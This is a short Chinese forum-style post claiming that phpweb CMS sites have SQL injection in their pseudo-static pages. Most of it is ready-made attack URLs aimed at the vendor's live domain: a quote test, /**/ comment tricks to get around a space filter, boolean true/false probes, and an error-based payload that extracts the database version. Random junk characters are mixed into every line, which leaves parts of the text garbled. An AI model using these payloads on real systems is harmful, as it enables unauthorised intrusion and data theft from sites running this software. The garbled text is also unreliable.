phpweb所有的整站程序伪静态页面都存在sql注入8 X+ p* N; J- k3 P8 o+ |& h
; C' z0 h* {; i; m3 t* k/ b
主站:http://phpweb.net/
+ F( R& m- g. c3 F, @3 U& ?5 M加’检测:
, d0 L; ?3 r8 E' k8 h 4 ^, t' O2 I. ?6 n
http://www.phpweb.net/down/html/?772′.html
6 q3 K) L2 V0 O5 {( ]
* `8 Q+ m6 n) d3 g8 m/ Y! z出错
9 @3 k7 Z1 l: E8 c3 @/ I存在注入。2 s4 {7 P" x- G# P) N* D
不能用空格,只能用/*罗
8 b0 }% A& S9 `) i! s* U7 y* hhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常2 e* u/ y; q. Y! Z5 K* o
: u! H+ V& x# t3 x- p, ~
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
% j. o z+ b$ X" E爆数据库版本:- d* I( V% B8 x
; g! ~* S4 s: b( j7 @ u+ W$ i?8 A( j1 O8 |" d1 d% K6 ^
14 s# C7 g% D0 o5 z
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
' c( q9 O- B, z# X$ |4 c更新日期: 2013-01-03 13:39:50 - j9 K2 k4 p3 S* X8 L1 H* r/ y5 f
|